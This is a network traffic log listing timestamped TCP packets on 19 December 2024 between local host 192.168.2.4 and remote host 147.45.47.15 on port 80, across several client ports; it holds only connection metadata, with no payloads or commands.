Dec 19, 2024 08:52:38.381582975 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.381594896 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.381659985 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.382402897 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.382414103 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.382424116 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.382442951 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.382467985 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.383239031 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.383249998 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.383259058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.383269072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.383294106 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.383311033 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.384170055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.384181976 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.384191036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.384340048 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.384964943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.384978056 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.384987116 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.385005951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.385081053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.385798931 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.385818005 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.385828018 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.385837078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.385896921 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.386054039 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.386647940 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.386667967 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.386683941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.386712074 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.387537956 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.387550116 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.387559891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.387600899 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.387609005 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.388370991 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.388382912 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.388392925 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.388403893 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.388421059 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.388462067 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.389250040 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.389261007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.389270067 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.389292002 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.390113115 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390125036 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390134096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390156031 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.390353918 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.390958071 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390969992 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390979052 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.390991926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.391004086 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.391037941 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.391877890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.391896009 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.391907930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.392050982 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.392673969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.392688036 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.392698050 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.392745018 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.392748117 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.393461943 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.393475056 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.393485069 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.393497944 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.393542051 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.393542051 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.394244909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.394257069 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.394268036 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.394304037 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.395045042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395056009 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395065069 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395109892 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.395117998 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.395821095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395833969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395844936 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395855904 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.395908117 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.395983934 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.396610022 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.396620989 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.396632910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.396652937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.397344112 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.397399902 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.397411108 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.397439003 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.397474051 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.398164988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.398175955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.398186922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.398197889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.398221970 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.398319960 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.399032116 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399055004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399065971 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399086952 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.399682999 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399696112 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399705887 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.399756908 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.399816036 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.400455952 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.400465965 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.400477886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.400489092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.400506973 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.400527000 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.401427984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.401444912 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.401456118 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.401495934 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.402060986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402079105 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402093887 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402098894 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.402231932 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.402715921 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402726889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402765036 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.402820110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402831078 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.402884960 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.403520107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.403532028 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.403542042 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.403584957 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.404263020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.404274940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.404287100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.404313087 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.404326916 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.405015945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405025959 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405039072 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405050993 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405091047 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.405092955 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.405787945 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405800104 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405812025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.405834913 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.406557083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.406569004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.406578064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.406616926 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.406624079 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.407310009 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.407325983 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.407340050 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.407351017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.407382011 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.407459021 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.408132076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408144951 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408158064 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408185005 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.408917904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408930063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408941984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.408987045 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.409029961 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.409626961 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.409637928 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.409647942 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.409658909 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.409723997 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.409723997 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.410463095 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.410475016 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.410485029 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.410505056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.411240101 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.411251068 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.411262035 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.411310911 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.411334991 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.411979914 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.411992073 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.412002087 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.412013054 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.412044048 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.412071943 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.412729979 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.412741899 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.412874937 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.412888050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.413543940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.413554907 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.413564920 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.413588047 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.413644075 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.414249897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.414261103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.414273024 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.414283991 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.414299011 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.414534092 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.415004969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415019035 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415030003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415056944 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.415756941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415767908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415779114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.415824890 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.415925026 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.416518927 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.416529894 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.416539907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.417278051 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.417294025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.417304993 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.417315960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.417331934 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.417718887 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.417718887 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.418035984 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418047905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418085098 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.418814898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418824911 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418836117 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418848038 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418858051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.418869972 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.418898106 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.418899059 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.419575930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.419586897 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.420310974 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.420336962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.420346975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.420356035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.420367002 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.420380116 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.420463085 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.421098948 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421108961 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421118021 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421128988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421137094 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.421233892 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.421895981 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421911001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421921968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.421946049 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.422622919 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.422633886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.422643900 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.422697067 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.422700882 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.423439026 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.423450947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.423460960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.423470974 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.423510075 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.424165010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.424175978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.424192905 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.424211979 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.424211979 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.425017118 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425029039 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425039053 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425062895 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.425121069 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.425698996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425710917 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425721884 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425733089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.425765038 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.425842047 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.426548958 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.426561117 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.426573038 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.426601887 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.427246094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.427265882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.427278996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.427325010 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.427336931 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.428075075 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428086996 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428096056 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428107977 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428117990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428136110 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.428149939 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.428880930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428893089 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428903103 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.428930044 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.428981066 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.429683924 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.429696083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.429706097 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.429737091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.429754972 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.430361986 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.430373907 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.430383921 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.430394888 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.430433035 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.431039095 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431051970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431062937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431088924 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.431099892 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.431826115 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431835890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431844950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.431977034 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.432637930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.432651043 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.432660103 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.432671070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.432684898 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.432684898 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.433372021 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.433383942 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.433393002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.433418989 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.433435917 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.434125900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434137106 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434145927 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.434169054 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.434843063 CET	80	49731	147.45.47.15	192.168.2.4
